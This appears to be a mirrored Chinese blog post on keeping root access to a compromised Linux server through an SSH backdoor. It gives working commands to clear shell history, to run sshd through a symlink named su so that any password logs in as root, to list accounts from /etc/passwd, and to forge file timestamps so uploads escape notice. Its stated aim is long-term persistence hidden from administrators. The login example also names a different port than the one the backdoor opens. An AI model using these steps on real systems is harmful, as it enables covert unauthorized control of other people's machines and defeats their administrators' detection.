zoukankan      html  css  js  c++  java
  • SSH 维持权限(好用)

    很多时候我们拿下机器后需要维持权限,在计划任务上加入定时反弹shell这很容易被 运维人员发现,有些场景没必要用到rootkit级别的后门,我们可以尝试使用ssh后门

    1.目的

    长期维持机器root权限,同时后门有需要躲避管理检测
    通信隐蔽、自启动项隐藏、文件隐藏、进程/模块隐藏、注册表隐藏、服务隐藏、端口隐藏等

    SSH命令痕迹清除,登陆之后先执行

    unset HISTFILE;export HISTFILESIZE=0;export HISTIGNORE=*;export HISTCONTROL=ignorespace

    每次输入命令前加上空格即可不再history中记录命令

    2.后门方式
    ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337
    3.使用使用任意密码登录系统后门
    ssh root:test@192.168.116.100 -p 31338
    4.查看存在哪些用户
    cat /etc/passwd|grep -v nologin|grep -v halt|grep -v shutdown|awk -F":" '{ print $1"|"$3"|"$4 }'|more
    1 # 如下
    2 root|0|0
    3 sync|4|65534
    4 mysql|104|109
    5 postgres|113|117
    6 arpwatch|117|120
    7 Debian-snmp|118|123
    8 speech-dispatcher|127|29
    9 Debian-gdm|130|138
    5.修改上传文件时间戳

    touch -r 老文件时间戳 新文件时间戳

    6.退出ssh
    exit
     注

    0.任意密码登陆的核心是auth sufficient pam_rootok.so,只要PAM配置文件中包含此配置即可SSH任意密码登陆,实践表明,可成功利用的PAM配置文件除了su还有chsh、chfn
    1.前提linux软连接连接ssh后门需要ssh配置允许PAM认证才能使用
    2.被控主机不允许root登录,可用其他已存在用户登录

  • 相关阅读:
    二叉树遍历
    NO.35 2021/12/13(06:50)[周一]
    NO.29 2021/11/30(06:30)[周二]
    NO.22 2021/11/19(06:15) [周五]
    The .NET ORM Architec
    C#格式字符串
    C# Attribute
    .net DLL反编译文件
    【Beta】Scrum meeting1
    【Alpha】Scrum meeting 6
  • 原文地址:https://www.cnblogs.com/Rightsec/p/11006189.html
Copyright © 2011-2022 走看看